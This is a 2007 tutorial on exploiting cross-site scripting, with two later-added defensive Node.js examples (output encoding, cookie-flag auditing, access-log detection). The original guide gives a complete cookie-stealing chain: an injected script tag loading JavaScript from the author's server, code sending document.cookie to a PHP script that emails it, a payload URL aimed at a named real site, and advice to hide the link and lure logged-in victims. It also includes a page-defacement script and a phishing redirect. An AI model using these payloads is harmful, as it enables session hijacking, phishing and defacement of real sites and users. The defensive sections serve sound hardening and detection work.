XSS Guide - Part 2

-------------------------------
Author: Langy
Date: 11-09-2007
Copyright: http://www.googlebig.com
-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

At this point we need the victim's cookie, which is where a "cookie grabber" comes in. A cookie grabber is a script that sits on our server; we include it through the vulnerable site's URL, and it sends the victim's cookies directly to us.

How to include a JavaScript file:

Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
In cookiescript.js we write code that takes the cookie and passes it to our server, which sends it to us by email.

First of all we need to create a redirect to our site that carries the cookie in a variable.

Then:

Code:
// contents of cookiescript.js: redirect to our server with the cookie appended as a variable
location.href = "http://googlebig.com/cookie.php?cookie=" + document.cookie;
Now we create cookie.php:

Code:
<?php mail("admin@googlebig.com", "Here's the stolen cookie", $_GET['cookie']); ?>
Now upload cookie.php and cookiescript.js to our server and then go to:

Code:
http://www.seap-puglia.it/default.as...a=2&strRicerca1="><script src="http://www.googlebig.com/cookiescript.js"></script>
If everything works, we will receive the cookie by email.

Now we send the link to the victim. We can send the full link or use a redirect service like http://www.tinyurl.com

Once the redirect is created (in this case http://tinyurl.com/2rgry5), we can contact the user, possibly through the same site, to make sure they open the link while they are logged in to the site.
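The defender's side of the cookie grabber described above, as an added example that is not part of the original guide: a Node.js script showing the two controls that break this attack. The first is attribute-encoding the reflected search term, so the "> break-out never reaches the page and no script tag is injected; the second is auditing Set-Cookie headers for the HttpOnly flag, without which document.cookie exposes the session to any injected script. The function names and the sample Set-Cookie headers are constructed for this example; the payload string is the one used in the guide.

```javascript
// Added example (not from the original guide). Assumed names: escapeHtmlAttribute,
// renderSearchBoxVulnerable, renderSearchBoxSafe, containsScriptTag, auditSetCookie.
// SAMPLE_HEADERS are constructed; PAYLOAD is the injection string from the guide.

// Encode a value for safe insertion inside a double-quoted HTML attribute.
function escapeHtmlAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering: the search term is echoed straight into the value attribute,
// so "><script src=...></script> closes the attribute and injects a script tag.
function renderSearchBoxVulnerable(term) {
  return '<input type="text" name="strRicerca1" value="' + term + '">';
}

// Hardened rendering: the same input is attribute-encoded first.
function renderSearchBoxSafe(term) {
  return '<input type="text" name="strRicerca1" value="' + escapeHtmlAttribute(term) + '">';
}

// True when a real <script> element appears in the rendered HTML, i.e. the
// injection broke out of the attribute.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Audit a list of Set-Cookie header values. Session cookies should carry HttpOnly
// (document.cookie cannot read them) and Secure. Returns the cookies that fail.
function auditSetCookie(headers) {
  const findings = [];
  for (const header of headers) {
    const [nameValue, ...attrs] = header.split(';').map(s => s.trim());
    const name = nameValue.split('=')[0];
    const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
    const missing = [];
    if (!flags.has('httponly')) missing.push('HttpOnly');
    if (!flags.has('secure')) missing.push('Secure');
    if (missing.length) findings.push({ name, missing });
  }
  return findings;
}

// The guide's payload and two constructed Set-Cookie headers: one as a typical
// unhardened session cookie, one with the flags set.
const PAYLOAD = '"><script src="http://www.googlebig.com/cookiescript.js"></script>';
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',                                 // readable by document.cookie
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', // hardened
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderSearchBoxVulnerable(PAYLOAD)); // script tag present
  console.log(renderSearchBoxSafe(PAYLOAD));       // inert &lt;script&gt; text
  console.log(auditSetCookie(SAMPLE_HEADERS));     // flags the first cookie
}
```

Run it with node; the vulnerable output contains a live script element, the safe output shows the payload as harmless text, and the audit reports the first cookie as missing HttpOnly and Secure. Both controls are needed: encoding stops this injection point, HttpOnly limits what any injection point elsewhere on the site can read.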

XSS THAT DOESN'T WORK

If an XSS does not work in that way, i.e. it gives us no chance of a redirect or of displaying cookies, it can still be used as a phishing page.

An example of such code is:

Code:
var title = "XSSED BY GOOGLEBIG.COM";
var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";
var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);

function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  // replace the whole page body with our own overlay
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
  if (imageUrl != "") {  // use the parameter, not the global image_url
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }
  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = pageTitle;  // use the parameter, not the global title
  overLay.appendChild(footer);
}
This code must be included in this way:

Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>
In this way we will see the JavaScript we created.

Even in this case we can rely on tinyurl to mask our complete URL and include the redirect directly.

Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>
Another way to bring the victim to the page we want is this:

Code:
http://[Sitevictim]/page.php?variable="><script>location.href="http://www.googlebig.com/fakepage.htm"</script>
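From the site owner's side, the injected script tags and location.href redirects shown throughout this guide all arrive in the query string, so they are visible in the web server's access log. As an added example that is not part of the original guide, here is a Node.js detector that URL-decodes the query string of each log line (repeatedly, so a double-encoded payload is still caught) and flags the indicators these attacks leave behind. The indicator list, the function names and the log lines are constructed for this example; the hosts in them are documentation addresses, not real targets.

```javascript
// Added example (not from the original guide). Assumed names: XSS_INDICATORS,
// fullyDecode, analyzeLogLine, findSuspiciousRequests. SAMPLE_LOG is constructed.

const XSS_INDICATORS = [
  { name: 'script-tag',        re: /<\s*script\b/i },
  { name: 'location-redirect', re: /location\s*\.\s*(href|replace|assign)/i },
  { name: 'event-handler',     re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri',    re: /javascript\s*:/i },
];

// Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Decode %xx (and +) up to three times, stopping when nothing changes or the
// sequence is malformed, so %2522 -> %22 -> " is still recognised.
function fullyDecode(s) {
  let cur = s, prev;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch (e) { break; }
  }
  return cur;
}

// Parse one line and return the indicators found in its decoded query string.
function analyzeLogLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  const [, ip, time, method, path, status] = m;
  const qs = path.includes('?') ? path.slice(path.indexOf('?') + 1) : '';
  const decoded = fullyDecode(qs);
  const hits = XSS_INDICATORS.filter(i => i.re.test(decoded)).map(i => i.name);
  return { ip, time, method, path: path.split('?')[0], status: Number(status), hits };
}

function findSuspiciousRequests(lines) {
  return lines.map(analyzeLogLine).filter(r => r && r.hits.length > 0);
}

// Constructed sample log: a normal search, a reflected script include,
// a double-encoded redirect payload, and an unrelated POST.
const SAMPLE_LOG = [
  '203.0.113.5 - - [11/Sep/2007:10:01:02 +0200] "GET /search.asp?strRicerca1=pizza HTTP/1.1" 200 5120',
  '203.0.113.5 - - [11/Sep/2007:10:01:40 +0200] "GET /search.asp?strRicerca1=%22%3E%3Cscript%20src%3D%22http%3A%2F%2Fexample.test%2Fx.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 5300',
  '198.51.100.7 - - [11/Sep/2007:10:02:15 +0200] "GET /page.php?variable=%2522%253E%253Cscript%253Elocation.href%253D%2522http%253A%252F%252Fexample.test%252Ffake.htm%2522%253C%252Fscript%253E HTTP/1.1" 200 4100',
  '198.51.100.9 - - [11/Sep/2007:10:03:00 +0200] "POST /login.php HTTP/1.1" 302 0',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of findSuspiciousRequests(SAMPLE_LOG)) {
    console.log(`${r.time} ${r.ip} ${r.method} ${r.path} -> ${r.hits.join(', ')}`);
  }
}
```

Two of the four constructed lines are reported: the plain script include and the double-encoded redirect, the latter matching both the script-tag and location-redirect indicators. A 200 status on such a request is the useful signal here: it means the page reflected the parameter rather than rejecting it, which is exactly the condition the guide relies on.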
This guide was created for information purposes only.

If you have found an XSS you must post it here http://www.xssed.com/submit and you must contact the vulnerable site's admin.